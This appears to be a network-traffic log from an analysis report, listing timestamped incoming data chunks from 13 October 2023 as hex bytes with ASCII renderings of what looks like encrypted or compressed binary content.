2023-10-13 13:21:14 UTC	6414	IN	Data Raw: 33 e4 60 d8 d0 04 75 c9 90 e1 49 9a 39 68 72 22 77 72 63 82 31 1a 96 d2 25 b7 a7 99 fa a8 1f 7a 28 eb cd f0 0e 34 38 a6 a8 56 93 9f bd 6b 77 a6 60 3e e1 2b bd de 47 c4 d8 73 65 f8 f2 e3 48 ad 4d f6 70 e9 e7 53 2b e0 13 d4 08 30 8d c1 7c fa d0 4c a5 55 54 ee 40 31 ae 73 f9 a7 c0 a1 be 8f ab 8e 46 af a6 9c 8e 16 b7 15 d3 6c 3f 96 9d de 85 fc 7f 9c 9b c8 fe c9 e6 aa 8e da 38 35 df cf 64 ff 6a ea 8d e7 9a 6e 08 53 83 e1 62 2d ac 46 d6 3f 28 50 a0 48 47 d5 f6 91 2c 9a 2a 91 93 49 87 7d 36 32 b8 ed 10 f1 b7 03 68 1b 93 e9 2b ab 4a af 53 a4 2c 91 49 f1 a0 40 11 a5 2c c1 49 c6 a9 08 5e 8c dc ba ee b5 07 38 0c d0 fd c3 77 cd 16 51 2f ec 6f 52 76 96 e4 f9 e4 0d 31 b0 41 e0 07 89 41 a7 5c fc 8e a7 9e 3e 9c 11 bf 30 b9 a4 11 52 a7 8a 5b c9 ea 1d 4f ef c7 00 38 52 d6 Data Ascii: 3`uI9hr"wrc1%z(48Vkw`>+GseHMpS+0\|LUT@1sFl?85djnSb-F?(PHG,*I}62h+JS,I@,I^8wQ/oRv1AA\>0R[O8R
2023-10-13 13:21:14 UTC	6430	IN	Data Raw: 96 e3 42 e5 68 0e b1 6e 5b 53 ea ab 54 be c2 52 53 59 b7 83 ca b2 c1 f1 10 b0 4d fa 7a 50 ea 0b 28 8b 33 99 79 a2 11 b1 17 a8 9e 59 2a a4 b7 ac 44 ec 81 31 ae ea d6 9d 93 8b 7c 8f 94 44 ac 74 17 d2 2a 53 bd a7 60 18 ed eb 9a c4 2d a8 8c e5 e6 51 17 8b a3 4e aa 7c bb 4e d0 64 35 92 a6 2b 08 35 01 2b c9 9f ae ca 94 d7 45 56 f5 5a 12 42 c3 53 66 97 fd ad 48 d6 29 da 9c 05 b0 ae ce 5f 38 8d 41 b0 ff d2 a8 56 17 fd 17 bb ec a4 9c 19 1c bd cb a7 a3 e7 51 21 2e 91 e3 d6 0e 13 6b df 30 02 2a 64 a4 13 86 2f a2 d0 7d 6f f4 ec a4 c1 5a f4 17 3a c6 7c d5 c9 c5 80 ba 0f 35 e5 27 ae 10 d1 d3 08 19 69 60 17 05 e6 88 27 55 ec 2f 2b b8 f5 92 6e bd bb 8e 1e a8 e7 09 2f ec 0c 22 92 4b 33 64 fb 05 96 27 bc 80 8a 2a 8f 3e 69 0e a4 d3 c4 8c bd 95 bf 0a 58 c7 04 c4 21 0d 65 87 Data Ascii: Bhn[STRSYMzP(3yYD1\|DtS`-QN\|Nd5+5+EVZBSfH)_8AVQ!.k0d/}oZ:\|5'i`'U/+n/"K3d'>iX!e
2023-10-13 13:21:14 UTC	6446	IN	Data Raw: 50 cc da cc 48 d8 9c ed c7 a7 39 ce 54 10 7c 7b 5d d2 29 60 01 0d 7f a4 16 15 9d fc be a9 47 8e 43 0b 36 78 81 7f 59 e4 34 ce 7c 4b b9 d8 e6 81 0e 37 38 23 57 a2 d6 04 3e 4c 22 e6 a7 37 68 40 38 97 81 20 01 d3 3e 3a 00 ce d3 91 76 f6 06 91 64 ef 6b 47 e9 42 48 5a 40 c4 6d e2 af 31 26 69 98 f3 8e 3a c4 7b bc 63 91 ad 0c c8 b8 95 7c 37 9b ab 20 e7 14 f8 71 d4 a8 dc a4 3c 3c 46 94 d2 b4 06 cb f9 42 c6 e0 48 13 2b cc 35 e6 37 74 21 fb a8 87 da 78 61 65 28 26 9e 88 7a 9b bb d3 72 ea 60 11 ff e0 49 57 c6 4e 2b 67 0f 4e c5 0f f8 ea b4 f6 8d 54 41 53 b5 62 3e 00 c7 66 e9 88 80 9e 11 94 7c ce b2 00 8f 62 70 f5 cf 64 06 57 73 19 5c f2 c0 16 8b 31 c2 ef 26 51 1e e1 26 25 7e c2 58 9d be 67 82 7e 89 2e b4 8d 69 c1 ba ad 5a 45 79 10 99 f7 44 20 c9 6e 6e 0e e1 d7 68 ff Data Ascii: PH9T\|{])`GC6xY4\|K78#W>L"7h@8 >:vdkGBHZ@m1&i:{c\|7 q<<FBH+57t!xae(&zr`IWN+gNTASb>f\|bpdWs\1&Q&%~Xg~.iZEyD nnh
2023-10-13 13:21:14 UTC	6462	IN	Data Raw: 21 9d 06 ff 60 f1 bd 38 ec a3 d9 21 95 84 f8 32 b3 15 15 b2 ae fb 97 a3 5d 2f 99 89 fb dc eb 46 0a 24 eb 76 7c 81 3d ea c8 43 ab 47 55 4c 40 85 3e f3 2b 9a cf d1 e7 9e a5 a9 78 3e dd f6 9c 84 08 03 65 15 fa e9 c1 99 26 6a ca 49 f1 f1 03 12 ec fc 7e d0 3f f7 16 c3 91 bf f6 e4 a6 7e 1e 9b 05 cc cd 4a ed af 45 01 4e 83 9f 79 3d b6 af c3 94 52 71 a6 e8 9d dc ec 72 35 07 c5 2e 1b 1f 91 db 1b 28 9a 89 08 4e f2 fe 7d c1 c0 7d 3d 1e 37 2e 62 5f 2a 91 ce 2c 89 2c f8 9b ee af db ba 13 ac 7c 8c 44 f8 67 f0 66 e4 68 51 46 f4 2b ad ab 64 24 0c 0a c4 62 14 0b d6 21 81 22 9e 62 b0 b2 5c c4 8e 0a 0d 1c eb 69 67 3f 47 5b ca 2b f4 82 94 c4 00 81 22 37 d3 f6 c0 cf bd c1 a1 99 4e dc 20 95 ea d7 80 1d 1a 6c 54 1c 29 ad 5c 94 33 11 c7 44 35 56 d4 db 31 9f 6e 50 5a f3 1a 5f 70 Data Ascii: !`8!2]/F$v\|=CGUL@>+x>e&jI~?~JENy=Rqr5.(N}}=7.b_*,,\|DgfhQF+d$b!"b\ig?G[+"7N lT)\3D5V1nPZ_p
2023-10-13 13:21:14 UTC	6478	IN	Data Raw: 73 55 6a b1 af 40 5e 6c 43 89 24 f4 5e 41 f5 c7 d6 a4 15 5a 1a d2 9d 66 0e ca ee 42 93 7a 66 4b 6e 58 b1 8e 58 ad 6c c0 a2 16 df 54 24 f3 6d 96 74 49 89 9d 85 cb d7 82 df 6a 0b 5c b5 e1 d2 fc 46 c3 88 eb 62 0d 0a 1d 98 ce 65 c4 67 e6 49 fd 16 1b 1e 34 5b ef 1a 9c b5 2c 6c c5 5f 06 7c cb 0f ba 6b 71 39 e4 c3 d8 46 ba 2e 78 89 6b bc cb f2 2c 50 e4 4e ac bc ab 01 ca 6c 9f 8e e5 1e 36 cf 4f 5e 6f a0 fa 85 68 d4 74 78 90 4a 11 66 f6 8a 94 4e a9 f8 47 88 74 68 90 d8 b1 dc 1c 7b 23 25 31 9a b6 5d 68 7e 48 59 3b 3e e3 d9 84 b0 aa b5 9b e8 76 e3 99 18 56 02 78 fe 2d 99 9f 25 d2 ec ca ac e5 6a 8f 58 c7 05 33 42 1e 6e f7 01 5f 27 21 10 a5 1b cf 12 54 eb bd 66 cb 48 aa 73 a0 fb c5 87 ad 4c 46 a3 ee d9 d9 21 2d a6 29 65 6c fd c1 2c dc 2c f6 84 79 e0 41 b9 8f 7c 47 6f Data Ascii: sUj@^lC$^AZfBzfKnXXlT$mtIj\FbegI4[,l_\|kq9F.xk,PNl6O^ohtxJfNGth{#%1]h~HY;>vVx-%jX3Bn_'!TfHsLF!-)el,,yA\|Go
2023-10-13 13:21:14 UTC	6494	IN	Data Raw: 7d df 1b 17 46 d2 21 1c 2c 74 05 c7 46 9c bf 9b 1b 35 27 d5 9c 68 78 9b 8c 63 51 43 07 d4 3e 6f 7f e4 56 ef 4a 87 e0 d4 ee a0 9c 28 42 4a b4 8c 15 03 19 dd bc f4 48 1c 8f b0 48 7a 73 31 f6 70 b0 3f f2 3c ac 34 6d f2 8c 77 4c ea 7b 39 b5 ba e6 d6 77 08 d8 2a 9e 26 88 7d d7 35 c5 4d e7 65 12 62 28 2a 45 b2 89 c3 66 6e ad 56 f4 a3 e1 71 b8 3f e1 a6 49 f2 e3 21 a2 92 87 27 92 c6 c9 d0 2f 8a 6c 38 75 a5 a5 05 19 f0 70 45 c5 b8 86 82 c4 26 51 fe ee 55 ef d7 7b 45 a4 55 a4 1b 49 0d 56 ad ca 55 40 39 24 67 eb ec 5a 40 2d f4 13 5a c7 40 da 30 45 58 32 25 a3 1b 57 cb aa 61 aa 36 03 d9 2e 35 75 78 b0 2c 92 e4 be 07 be 3a fd 59 31 f0 db c5 8b 67 d3 2b f0 6f c5 30 8f 3e e8 96 83 af ea f6 37 db 4f f9 a4 6c 97 7d d2 b3 62 86 2f 45 d0 6c a8 0e 04 41 73 64 89 35 19 23 81 Data Ascii: }F!,tF5'hxcQC>oVJ(BJHHzs1p?<4mwL{9w&}5Meb(EfnVq?I!'/l8upE&QU{EUIVU@9$gZ@-Z@0EX2%Wa6.5ux,:Y1g+o0>7Ol}b/ElAsd5#
2023-10-13 13:21:14 UTC	6510	IN	Data Raw: ff 20 3f 17 f8 be 21 6d 39 21 ce 67 bc 12 75 b1 3e 8a cc d7 43 95 8c 3b 83 07 c5 25 81 07 40 a1 10 d3 69 ca 8b b8 a4 39 98 c3 dd 7c c1 89 3a af e3 ce c7 ff ba 8b 99 1d d5 36 28 a3 8d 2a 5e cf 52 71 f3 39 0a da 64 f0 12 75 8d d3 12 14 59 46 b9 e1 67 72 5b 6e 1f ef b0 ec 9a 17 4c 1f 9c c9 37 67 ac f1 ce 3a 6f 68 98 12 e3 62 41 5e 9e 70 48 43 e2 d2 53 12 5a f3 66 19 f5 00 e8 b8 1d a6 ab 72 82 93 2f 3a 49 a7 fd 55 dc fc 72 09 f1 37 09 92 51 33 dc cd ff c7 57 80 d9 e5 83 72 b7 37 77 87 5f 91 65 dc d3 74 f5 32 b8 97 2f 74 53 c5 f0 36 07 82 8b 19 8f e3 b4 60 bd 1d 89 5a ce 1b 1e f3 8d 3a a2 77 b2 1f fe c6 8a dc 6b e2 cc e3 f6 0a 74 1e 14 25 a1 38 31 6f a3 9c 04 ea 61 67 d5 e2 15 8a 67 ac 91 5a 4c 7d 33 92 99 a8 33 37 62 0d 29 6b fe 78 73 c1 a8 6a 0c 60 88 f7 4a Data Ascii: ?!m9!gu>C;%@i9\|:6(*^Rq9duYFgr[nL7g:ohbA^pHCSZfr/:IUr7Q3Wr7w_et2/tS6`Z:wkt%81oaggZL}337b)kxsj`J
2023-10-13 13:21:14 UTC	6526	IN	Data Raw: 8c 45 ed c3 80 45 9f 4f e1 67 ed 4d 24 3e 06 b4 01 3e 14 47 45 98 14 7a ef f9 a7 26 d5 b6 b0 4c ec d3 c9 0f 2a 17 1b a7 0a f2 e3 ff 43 1c e3 1f 9e f4 09 8b 8b e1 0d a6 11 0c c8 0c 45 0b 9c fe 06 67 89 71 11 40 d3 1d 8e fb 32 4f 27 27 74 3d e6 27 92 10 5c fb 06 07 8a 93 b4 30 41 f3 3c 46 49 74 1a 59 40 3a 81 2e 79 b5 5f 5a df fe c7 af 42 62 44 df 3e cd 2e df 27 ea 4d ca a5 ab 93 af fc 2f d2 69 fa 00 86 ad 27 e0 ff 2a 02 70 33 a8 ff af 3d 2c 8b a5 15 d4 19 f7 e4 2c 12 06 ed 94 ce d8 89 eb fd 12 53 92 b3 a6 57 f9 12 3e df 96 df d4 d8 20 b9 97 6f b9 f8 21 ba 01 ff 6d 87 88 49 94 cc 11 48 f4 65 26 18 fe c8 86 63 13 0b f8 1e 1f cb dd 67 f5 59 6a cf 83 6a b4 96 3f e6 ef 1b e8 1b 8b e1 d8 2c 6d 63 7e 23 11 d4 95 54 f0 0a 53 38 74 c2 96 bf 6a 82 95 16 b1 4e 18 0d Data Ascii: EEOgM$>>GEz&LCEgq@2O''t='\0A<FItY@:.y_ZBbD>.'M/i'p3=,,SW> o!mIHe&cgYjj?,mc~#TS8tjN
2023-10-13 13:21:14 UTC	6542	IN	Data Raw: d5 d3 7b ab ef 6c 62 ba d6 13 c3 d3 60 08 5d 82 b3 bf 4f a4 c9 29 23 05 e3 97 e6 8a e9 89 ec 20 e0 f8 b6 51 75 80 cc 3e 6b 94 0e 27 71 64 f5 a3 c8 24 fd 4d f8 7c 44 11 e8 35 bd 09 1e 9e 9f 0f 10 db 1b 7c 5f f3 c5 1b d0 17 0c 49 f2 93 fe 7a 09 10 61 39 ef 69 6a ee 62 e8 b4 e1 28 f4 bc 54 a6 a7 82 cc 18 98 a5 ab 0c 6f bd bd 93 c1 b8 6b 91 09 ce 2c a6 a3 6a 06 9c a1 14 a3 1f 36 e3 06 35 ae 26 cc 96 8e 1b 6f 54 da 6a 94 53 32 9d 24 45 59 06 20 c8 27 fd b2 31 1d f5 a3 ec 1a 4b 3b 51 9b 43 50 ee a4 2a c5 56 a3 a7 f6 98 e7 d1 76 1e c9 80 96 15 33 41 87 55 33 8c a8 8b de 42 0c 9f dc 41 49 c1 87 f8 c0 46 00 00 26 c5 27 c0 1f ff 5a 91 af bb 82 e4 29 9f fe 63 a5 ca ad 5d 35 e9 91 2d 48 de 42 74 d7 d4 b0 09 6c df 55 04 52 f3 ef 42 07 a0 0e e8 97 33 01 f2 3a 1e cf 03 Data Ascii: {lb`]O)# Qu>k'qd$M\|D5\|_Iza9ijb(Tok,j65&oTjS2$EY '1K;QCP*Vv3AU3BAIF&'Z)c]5-HBtlURB3:
2023-10-13 13:21:14 UTC	6558	IN	Data Raw: 86 3a 23 59 69 d3 d0 64 bc a2 96 a4 4f 1f 97 7d fd 1b 0b 56 72 0d 9b ed f5 c0 05 6b 87 ff 5f 0f 6d d4 33 36 a5 71 de 61 b1 e7 03 46 1f 60 da ea 3e 7a f8 bc e8 40 58 1a d5 04 d8 93 c9 80 b3 9d 89 e3 1f bf a9 ed 93 04 4f 6c 3f 28 fa 5a 24 67 27 d6 52 64 a6 ab 5a 57 6b 6e ad ad 1e 95 1c 34 96 be 7a 92 da 12 ef 9f 60 ff 7a 77 78 c9 ca 36 18 78 07 eb 4b 81 38 ea 9c b9 2d 3e 50 65 c3 69 c2 24 a1 3d c0 3e 79 23 97 fa 03 e8 f7 2f 54 4c fc db 8c 9a f8 9f 68 a6 c3 97 a4 15 b7 cf 2b ba 86 35 11 f8 da 6a 48 46 f6 c4 7e 79 8a c0 95 23 e3 27 75 92 06 de 50 c3 08 70 56 6e fe 30 e9 c4 ab 69 cd 19 29 87 8f 4b c9 7f d4 fc 2d 15 84 4b b3 08 43 ce 30 a7 5b a6 79 67 4b 6a ea a7 85 ce ff 1e 12 34 8f d5 ce b3 2a 27 73 06 d2 93 15 10 e8 f2 99 a0 02 f6 76 ab 2b a7 ad c0 b0 f9 54 Data Ascii: :#YidO}Vrk_m36qaF`>z@XOl?(Z$g'RdZWkn4z`zwx6xK8->Pei$=>y#/TLh+5jHF~y#'uPpVn0i)K-KC0[ygKj4*'sv+T
2023-10-13 13:21:14 UTC	6574	IN	Data Raw: e8 48 e9 0e 6b 07 93 c4 68 29 69 73 3b 65 af eb 27 2b c5 3f 40 fc 2b 23 e7 cf e5 5c 80 14 c9 19 ed af 07 97 fa fc 84 b3 f7 47 fa c4 06 49 5b 94 9d 92 45 d4 e3 cb 19 76 5e cb 2a 4d 6c 0c 76 16 1d 3b e2 1d 58 f5 f7 2b 59 30 5b 17 81 d0 14 72 0a 8b be 71 d6 08 3f ee 75 01 0f 4c 18 f3 bb fa cf 4a b0 d7 ee 14 d9 13 d6 5c 09 0c dd c2 dc d0 3b 8e 80 38 a9 42 4e 18 a5 6b 5f e9 5f 00 9d 9f 01 6a 88 4b 70 1a 19 b2 dd 96 99 25 96 36 70 91 54 57 81 e5 bf ad b0 d2 99 7c 67 26 60 c5 f6 87 4d 40 58 61 3a 1a d8 86 05 5e ab 34 e2 63 4d 81 e1 89 d9 c6 38 72 07 6a b7 5c 7f f1 f3 48 32 48 d3 be 6c 65 97 0a d9 cb 12 2c 6f 3b 64 50 86 86 4a 56 f6 80 ee 7c 13 97 89 d0 06 7f 10 44 2d 30 84 6b c1 a0 b0 01 25 8c c2 e1 17 22 ee 1a 48 80 b6 f5 c3 cb 82 bb 4e a2 64 d4 86 7a fa ce b5 Data Ascii: Hkh)is;e'+?@+#\GI[Ev^*Mlv;X+Y0[rq?uLJ\;8BNk__jKp%6pTW\|g&`M@Xa:^4cM8rj\H2Hle,o;dPJV\|D-0k%"HNdz
2023-10-13 13:21:14 UTC	6590	IN	Data Raw: 43 e6 9d 7a 84 a1 59 42 4e 91 f4 d2 3c b4 d3 d6 8e a8 d4 1c 30 cb 76 90 65 b6 4d 19 77 07 b0 c8 fc 13 3f 18 85 6a 58 57 ba 7f cb 96 93 a9 af 2e 74 c4 55 04 d3 80 17 d9 24 cc a9 04 66 38 d1 a3 8a 25 26 01 e6 fd 24 10 ba c0 63 23 fe 59 f5 98 7a 87 2f 35 b6 2c 80 c2 d0 68 a4 f9 19 41 80 3f a3 fb 81 f1 7d ff be 8b ec 7a c7 42 95 cc 45 36 3c c5 90 ae 89 ac 6b 3d 13 80 14 78 90 cb a9 6b af b5 73 24 ed 8c a5 9b 3c 91 38 30 44 bd 9d 18 ff 1f 3a fe b9 ed dd dc 2e 51 18 92 08 45 6d 83 e4 43 36 30 56 f7 4c 99 b3 16 1f 77 55 67 70 e4 7a 6c 99 58 e0 a9 5d d7 48 ca 93 d5 5c db 24 69 be 40 8b 25 b1 1a 08 d9 db c6 9a 2b 92 78 88 7f d8 ae b4 b2 d1 e2 c5 f1 34 05 bf 77 58 ef f8 8c 60 71 a3 2e 5e b0 01 36 b4 0f 5a 9a e2 23 e0 ed 52 11 dd ad d4 b8 c2 94 9c 9b cf 38 f6 8e 1c Data Ascii: CzYBN<0veMw?jXW.tU$f8%&$c#Yz/5,hA?}zBE6<k=xks$<80D:.QEmC60VLwUgpzlX]H\$i@%+x4wX`q.^6Z#R8
2023-10-13 13:21:14 UTC	6606	IN	Data Raw: 13 f6 8e 22 c2 5f c3 2f f3 6f 9d 42 89 cb f2 93 83 d4 ad b0 11 ce 8c 90 31 08 58 1f 41 8d 3c bd f9 67 81 de 0c 84 26 49 c9 e0 5c 7a 8b 3d b4 c7 c7 ad c1 d6 2d b8 e7 b6 b8 77 15 8c 2e 38 32 65 6a 65 59 13 63 4b 11 74 33 fe 7a 69 97 ab 47 b8 3a ef 1b e5 b5 6d e3 ac 5e 8f 79 5f ad 14 f4 a5 30 77 45 41 55 7d 28 0b 66 f7 7f 74 39 59 33 2e 19 b8 c4 cd cb 57 33 19 b1 04 4d ce db c6 d5 54 fc b7 47 7c ad 6a 18 7e ef 55 9f 19 ad 73 ea 41 03 bc 90 63 89 13 0c 1b 8f 12 ab 6e 93 23 af 95 ce ac e7 b2 94 37 f8 78 51 5e 92 f1 a0 7b b1 58 a2 2d 94 a1 81 c4 24 0b 4f a2 65 ec 03 15 a2 a3 e9 f5 77 f4 51 0d 6f 83 23 2d 89 77 2d a7 d6 15 9a 77 56 78 e7 77 69 74 3c 72 78 5d a5 27 ed 36 61 8a 17 69 13 41 e6 40 4f 57 8e 38 30 28 1a 89 7d 13 97 02 a6 b5 e8 aa a8 5d 1c 5e f0 d9 d1 Data Ascii: "_/oB1XA<g&I\z=-w.82ejeYcKt3ziG:m^y_0wEAU}(ft9Y3.W3MTG\|j~UsAcn#7xQ^{X-$OewQo#-w-wVxwit<rx]'6aiA@OW80(}]^
2023-10-13 13:21:14 UTC	6622	IN	Data Raw: 3e 1f 1e da cd e7 66 2e 62 03 50 72 76 b9 d3 eb 54 6c 09 be 19 30 95 e4 08 2d c2 2d 32 80 6f e4 ab 2c 3a 31 2e 0c 38 4b 0c db f0 18 df 6f c0 bc 07 4e 12 bd 9e 6d 9a f8 10 a0 8d 2c 17 ba f0 e5 43 17 c5 71 d9 72 c7 a2 90 44 97 56 cc 80 46 c3 47 03 d0 79 31 95 66 58 d1 5a e3 61 b3 2b c7 7a 80 4b e1 bf b7 2a fe f5 b1 c3 56 3a f5 54 59 ef f3 bd 3c 16 78 8b 19 6b f7 2d e1 43 e4 52 a4 ae e2 79 c6 17 37 57 0a 9e b9 93 a3 2a 5a 72 8f b4 c9 90 0a 0e 09 12 74 45 98 56 95 8c 57 d9 2f 5d 6a 4e f7 fc 99 7e 6e 35 5d cd 01 94 b3 c0 7d ed 45 8d 96 52 ff 5f de b1 53 95 89 38 14 9c 0f 40 e3 79 8c 9f 6d 05 87 b0 8b 83 74 e0 ff 0a 77 aa 7c 0e bb 42 58 cc de c5 28 13 f7 86 80 03 cb 44 80 39 71 ea 94 08 a5 5f 7e 72 a9 8d 85 e6 2e 3f a7 25 4d 7f 13 e8 65 67 72 db d5 3c b1 68 09 Data Ascii: >f.bPrvTl0--2o,:1.8KoNm,CqrDVFGy1fXZa+zKV:TY<xk-CRy7WZrtEVW/]jN~n5]}ER_S8@ymtw\|BX(D9q_~r.?%Megr<h
2023-10-13 13:21:15 UTC	6638	IN	Data Raw: 40 2d 8c e0 6e ad 04 78 91 b8 ab 56 c9 09 24 28 88 d0 ef 9e 41 94 43 8a 67 17 6c 22 83 d3 b4 17 6b 4e 2c b3 5c 8a 69 58 23 79 06 c4 c8 06 1e 06 1e 42 a2 a3 be 90 48 2c 88 76 ca c3 cb 13 e8 e6 fb 48 ef d7 05 8c 14 fd 1c 35 bc 52 40 ae 49 d8 31 3d aa 4a 14 30 14 42 d5 35 03 1c df 75 da 6f 49 62 99 02 88 32 3b be a7 f9 f7 03 b2 1e 3a 49 18 46 0d b9 5c 2f 7a 6c 98 e3 65 d8 16 1c 14 d7 b9 88 2c 70 63 a4 c5 fb 3a 78 44 f7 15 92 17 e3 f2 39 b5 3b 9b 6a 8a 81 94 a7 d3 33 33 49 8f fe 8e a1 eb 8d 7d aa 40 c6 60 cc 63 0e 08 9f d8 a9 f4 d6 45 55 c6 09 ec 3f 28 61 64 fd 0e 00 2f b3 d3 40 6c 94 50 be 76 7c e5 04 a1 93 7d 3d 65 74 65 23 55 ab ff 38 00 4c c0 53 f0 5a 25 c9 35 49 e6 6f c9 59 59 53 2e 02 f1 0e 47 51 23 23 98 d5 bf 4b c9 32 7e 76 96 20 17 0e 16 65 d6 e3 39 Data Ascii: @-nxV$(ACgl"kN,\iX#yBH,vH5R@I1=J0B5uoIb2;:IF\/zle,pc:xD9;j33I}@`cEU?(ad/@lPv\|}=ete#U8LSZ%5IoYYS.GQ##K2~v e9
2023-10-13 13:21:15 UTC	6654	IN	Data Raw: 3e d0 9b f8 34 95 dd 4a 51 c4 43 0c 81 49 c4 08 c5 4f d7 85 c7 dc cd cf cf 15 fd 87 4c 04 b0 fe 66 ee 85 0e f1 73 90 c9 d7 0d df 96 d0 f8 3e 50 88 3f af 55 31 42 42 15 4a 1e 55 7e 6a ba 46 d7 2e 9d 71 27 3c 7b 05 5b f2 fc 9f c1 02 70 8a 4c f2 7e 71 b1 5e c6 b1 53 63 3e 66 81 49 09 15 c7 de 05 20 5a b4 2d 48 7c ef 63 0c 83 ad e9 33 8d 4c 3e f0 43 94 71 74 c2 b5 95 7a 77 2c c3 48 49 f4 74 47 cd 59 72 c5 3e 2e 42 7c af 95 d3 15 59 81 40 d8 1c b6 c4 21 ef a0 27 f3 0a 81 63 bd 0e 08 7b b0 02 94 d0 ba a0 c0 2d bf 41 b3 a0 6a cd b5 c7 9e 5f 9c 81 af e4 52 64 f0 61 45 58 29 f4 5e fb 24 4b 75 61 6e 1f 00 44 90 d4 90 87 68 e1 8e dd 05 46 4f fc d1 1c b1 ab 22 df a9 a6 84 ae fa 60 99 4d c5 94 af 98 54 d9 6a df 45 88 45 c9 ae eb 9b 2b fe e3 c3 65 98 df 81 48 4c 8d 10 Data Ascii: >4JQCIOLfs>P?U1BBJU~jF.q'<{[pL~q^Sc>fI Z-H\|c3L>Cqtzw,HItGYr>.B\|Y@!'c{-Aj_RdaEX)^$KuanDhFO"`MTjEE+eHL
2023-10-13 13:21:15 UTC	6670	IN	Data Raw: 0a df 73 24 f3 67 f3 e6 4f b3 01 a5 42 62 2f 5e a9 b1 f4 fd e8 e7 8f 7f 78 7f 88 51 5c 1e 6c 79 73 b4 33 c1 60 e2 cd ae 31 cc cb e0 6c a3 4b ce af 76 55 a8 d0 3a 0d b7 dd b0 11 ca 9a 15 d7 1e 3d cb 51 d9 2a 53 c6 3b f8 2b 3e 25 2f 49 f7 6d 23 ea b3 ce ae a8 03 91 fb 6d 34 94 3c 31 7b 1d 8f f4 b7 d2 c4 34 ae 84 ea 89 b6 d9 11 51 ed 0b 87 36 e0 c1 47 12 c0 13 08 d1 b6 5d aa e3 c7 9a a6 2c 66 84 c2 86 29 e1 e6 83 9b 83 cc 9a eb cd 6d 48 7b 5d 19 66 61 53 77 8e e9 a3 86 c6 bd 2f 4c 6a 67 e4 23 db a5 68 28 f1 ed cb b3 46 ff fa 23 b8 00 a1 15 6a 73 67 16 0a 60 ac 90 7d b3 6b 6c 8a bf 1c 30 69 16 81 3e 6d 7b 21 2c b7 36 7e 12 d0 03 1a 8b e6 5d 02 00 a5 2f cf 57 f4 7e a5 22 29 bc 5f 1d 0e 2f 52 87 c8 83 32 5f 3c 8f 9a 50 0c 4d 1e 22 4e 38 ad 93 b9 29 fb 04 2b 00 Data Ascii: s$gOBb/^xQ\lys3`1lKvU:=Q*S;+>%/Im#m4<1{4Q6G],f)mH{]faSw/Ljg#h(F#jsg`}kl0i>m{!,6~]/W~")_/R2_<PM"N8)+
2023-10-13 13:21:15 UTC	6686	IN	Data Raw: 14 63 0f cc 07 a2 ae 81 4e 8f 7a c0 d0 2c 0b cd 31 5b 83 6b ac 45 ba da b3 8f 8a 2c c9 94 b8 6e 46 fe cd 13 e3 7f 3b 14 a5 83 2a 8b 0f 37 c4 57 1a eb 7d 9d 51 4b 95 1e 43 9a 8e c4 e4 3c 49 f0 1c d0 f4 28 53 69 f5 59 a9 fb 2a a3 31 04 db 72 60 cf cf 89 52 24 ea 10 be 88 71 dd fb 54 76 4b b1 82 dd 3a 23 08 3c 34 cc e0 e8 14 0a 31 15 47 c9 d1 52 82 e5 04 ca c4 5f 3c d4 2f f0 8c 14 db 62 54 e4 bc f8 71 03 58 09 d1 f2 e1 5d a0 04 a9 6a 62 00 c2 11 7e e3 53 f2 e0 d3 67 37 2f 64 0d f8 3d 90 4d 49 85 0b fd e4 50 43 e4 22 4e 38 63 d7 48 0b 17 21 14 5b cb 2c 99 10 53 53 e2 81 4c db 72 7a ca 4e 5e 30 95 44 19 f2 c1 7a 6e e7 86 79 69 42 6b 08 49 0e e8 64 d6 08 e5 9b e1 9f 93 8d b2 81 d3 6c 3f 4d 26 33 16 13 75 eb d1 65 dc 84 aa 6f 9e 16 19 5d c0 36 2b c3 75 a4 d0 25 Data Ascii: cNz,1[kE,nF;7W}QKC<I(SiY1r`R$qTvK:#<41GR_</bTqX]jb~Sg7/d=MIPC"N8cH![,SSLrzN^0DznyiBkIdl?M&3ueo]6+u%
2023-10-13 13:21:15 UTC	6702	IN	Data Raw: e7 96 68 cc b3 34 b8 5c 29 22 15 ae 5b 2c 7b 3c 80 e1 95 7c 8a 1d 54 67 cf 91 17 ee 46 23 6f 07 95 ce 2d fb 82 71 90 87 14 14 84 8a ae 18 03 3c 00 3d 02 23 0c 31 14 64 7b a7 eb f1 68 ba 1b f4 f4 82 d3 5a 78 7d 08 99 d2 93 9d 7e 41 02 a0 7a 5a 47 d4 a3 36 69 e0 b4 a6 f2 57 0b 29 5f 5d 84 2a ea 58 75 6d 1d 64 8b 0d 88 4f 2d c1 d9 6f 76 4e a3 c3 28 0a 0b 09 b8 7f 60 46 e9 c1 16 ce 03 74 bd 5d b1 42 21 f4 7a e6 da f2 7a c2 85 a0 d2 08 41 78 b2 24 47 05 5b f7 03 ab e0 8b c7 ac 5a 88 5c 2f 5a b0 2e 64 10 d4 6f 7c d4 7c 34 91 c0 8f 67 d6 79 cf 7c 35 6c 8d ac a7 b1 29 c7 ae 20 66 37 28 fb 3f c9 0a 93 01 d2 77 03 dc 51 63 43 24 7f 65 2f d6 f7 c3 c1 50 86 fe bd 91 f6 e7 d2 ab dc e5 f4 8f 8d 85 b8 bc 2e fe 09 1e a8 15 99 5a bd 8c 52 94 ef 16 fd bd 28 1f 54 59 ee ee Data Ascii: h4\)"[,{<\|TgF#o-q<=#1d{hZx}~AzZG6iW)_]*XumdO-ovN(`Ft]B!zzAx$G[Z\/Z.do\|\|4gy\|5l) f7(?wQcC$e/P.ZR(TY
2023-10-13 13:21:15 UTC	6718	IN	Data Raw: 5d a1 5f 7b 08 e3 38 35 51 46 60 1f fa 66 ac 9d e1 93 30 20 1b 0c e8 45 e9 ed 74 4f 94 9f c0 ba 01 cf e7 61 fd 2f 73 3a ba cd 2a 6d 85 4c ba 9c 8d d9 98 f6 50 ce 5a 78 7c ad 3a fe 82 29 f2 b6 b5 ab 33 5f 21 f9 28 f0 fa 9b b6 3d 96 a9 5c c6 ce f5 c2 6a 20 1d cd f8 43 5d b0 a1 f2 5c 8b bf 44 fe 98 de 5f f1 c1 11 53 a0 9d 46 06 69 5f ff ad 0e 31 8a 40 f0 66 d7 a1 2b 11 bb f5 2c 3d b4 71 83 ec d2 61 71 ad 4b 2d ca 6f 37 46 2f 39 36 72 e5 56 d4 17 4d 2a d4 c4 4e ce bf e4 f0 0a 62 5b 71 2a 21 03 c5 4f 5a 71 4e 34 56 00 a5 9a 0c 81 9c 09 97 42 f9 5e a1 c8 11 26 47 31 f7 2b e8 12 13 6d 7c 6d 9a 4d 70 e6 88 11 eb 57 09 bf 4c 29 3a 8f 57 89 b1 53 d9 e5 e4 b3 28 2e f0 c0 03 4b 9e 9d fc 69 02 9c d8 